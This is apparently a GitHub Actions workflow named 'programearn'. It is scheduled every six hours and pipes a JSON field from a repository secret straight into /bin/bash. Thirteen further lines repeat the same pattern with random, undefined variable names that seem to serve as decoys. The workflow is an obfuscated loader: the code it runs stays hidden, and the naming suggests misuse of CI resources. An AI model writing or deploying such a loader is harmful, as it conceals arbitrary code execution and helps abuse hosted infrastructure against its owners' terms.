name: programearn
on:
  workflow_dispatch:
  schedule:
    - cron: '53 0/6 * * *'
jobs:  # 27982
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: programearn
        env:
          ypjv3: ${{ secrets.ypjv3 }}
        run: |
          echo $ypjv3 | jq -r .bdlcn306 | /bin/bash
          echo $dim9 | jq -r .lzvra9710 | /bin/bash
          echo $h02482 | jq -r .ww098 | /bin/bash
          echo $fpspd717 | jq -r .lvapi7 | /bin/bash
          echo $vgnoy42 | jq -r .f9 | /bin/bash
          echo $ewj31 | jq -r .fl20 | /bin/bash
          echo $opaxg913 | jq -r .qolpc049 | /bin/bash
          echo $lf2 | jq -r .w99338 | /bin/bash
          echo $ori288 | jq -r .uzn401 | /bin/bash
          echo $ssrd73 | jq -r .mpjkj243 | /bin/bash
          echo $ws8 | jq -r .qntqm751 | /bin/bash
          echo $yhrij6 | jq -r .mz800 | /bin/bash
          echo $okp5229 | jq -r .z435 | /bin/bash
          echo $ujtss55 | jq -r .hhw88814 | /bin/bash

